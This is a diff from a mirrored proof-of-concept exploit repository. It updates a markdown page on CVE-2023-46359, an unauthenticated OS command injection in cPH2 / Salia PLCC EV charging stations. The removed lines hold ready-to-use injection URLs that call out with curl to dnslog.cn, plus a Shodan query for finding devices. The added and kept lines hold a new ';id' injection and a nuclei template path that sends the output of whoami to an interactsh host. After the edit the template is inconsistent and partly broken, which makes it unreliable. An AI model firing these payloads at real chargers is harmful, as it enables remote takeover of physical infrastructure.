mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-06-20 18:01:14 +00:00
Update Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359).md
This commit is contained in:
parent
9b58d3035c
commit
89bee78821
@ -5,48 +5,15 @@
|
|||||||
"Salia PLCC"
|
"Salia PLCC"
|
||||||
```
|
```
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
## poc
|
## poc
|
||||||
```
|
```
|
||||||
/connectioncheck.php?ip=127.0.0.1%20&&%20curl%20http://dnslog.cn
|
/nwcheckexec.php?type=ping&dest=8.8.8.8;id
|
||||||
|
|
||||||
/connectioncheck.php?ip=127.0.0.1%20&&%20${curl%209qa1r0.dnslog.cn}
|
|
||||||
```
|
```
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||

|
|
||||||
|
|
||||||
|
|
||||||
## yaml poc
|
|
||||||
```
|
|
||||||
id: CVE-2023-46359
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: cPH2 Charging Station v1.87.0 - OS Command Injection
|
|
||||||
author: mlec
|
|
||||||
severity: critical
|
|
||||||
description: |
|
|
||||||
An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.
|
|
||||||
remediation: Fixed in version 2.0.0
|
|
||||||
reference:
|
|
||||||
- https://www.offensity.com/en/blog/os-command-injection-in-cph2-charging-station-200-cve-2023-46359-and-cve-2023-46360/
|
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-46359
|
|
||||||
classification:
|
|
||||||
cvss-metrics: CVSS:3.1/AV:A/AC:N/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
||||||
cvss-score: 9.6
|
|
||||||
cve-id: CVE-2023-46359
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
max-request: 1
|
|
||||||
shodan-query: html:"Salia PLCC"
|
|
||||||
tags: cve,cve2023,salia-plcc,cph2,rce
|
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"
|
- "{{BaseURL}}/nwcheckexec.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
Loading…
x
Reference in New Issue
Block a user